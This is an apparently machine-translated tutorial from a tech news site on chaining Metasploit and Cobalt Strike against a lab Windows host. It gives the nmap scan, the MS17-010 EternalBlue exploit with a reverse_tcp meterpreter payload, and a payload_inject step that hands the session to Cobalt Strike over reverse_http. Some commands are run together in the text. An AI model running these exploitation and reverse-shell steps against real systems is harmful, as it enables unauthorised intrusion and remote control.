How to make MSF and CobaltStrike Linkage 01/18 Update SLTechnology News&Howtos

How to make MSF and CobaltStrike Linkage

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article shows you how to do MSF and CobaltStrike linkage, the content is concise and easy to understand, absolutely can make your eyes shine, through the detailed introduction of this article I hope you can gain something.

0x00 Environment Introduction

Attack aircraft: 192.168.60.129 (kali)

Victim: 192.168.60.131

Gateway: 192.168.60.2

Tools: nmap, metaspolit, cobaltstrike

0x01 Attack ready

First deploy the victim host modulation NIC can communicate with each other.

Next, deploy web application services that look like real application servers.

0x02 Pre-attack phase

Open ports 445, 3389 and operating system version information were discovered by using nmap information collection.

nmap -A 192.168.60.131

Through information collection, it is found that port 445 of the system is open, and tools are used to detect whether ms17_010 vulnerability exists.

Approaching the artifact 1 Metaspolit comes on stage

First open msf, exploit vulnerabilities

1. Search exploit module

search ms17_010

2. exploitability of the vulnerability in relation to

use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcpset RHOST 192.168.60.131set LHOST 192.168.60.129

session

Enter the meterpreter session.

Approaching artifact 2 Cobaltstrike on stage

If you think there are too few functions, you can also link with Cobaltstrike.

Start Cobaltstrike

Now get a session that is a MSF meterpreter type and session id is 1

Create a new monitor in Cobaltstrike, configured as follows:

Set in MSF as follows

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler trueset lhost 192.168.60.129set lport 12388set session 1

exploit

You can see that the Metepreter session that MSF bounced back was captured in Cobaltstrike.

Finally, the penetration module integrated in Cobaltstrike can be used for further testing.

Note: Only Meterpreter type sessions can be derived from Cobaltstrike.

That's how MSF and Cobalt Strike work together. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.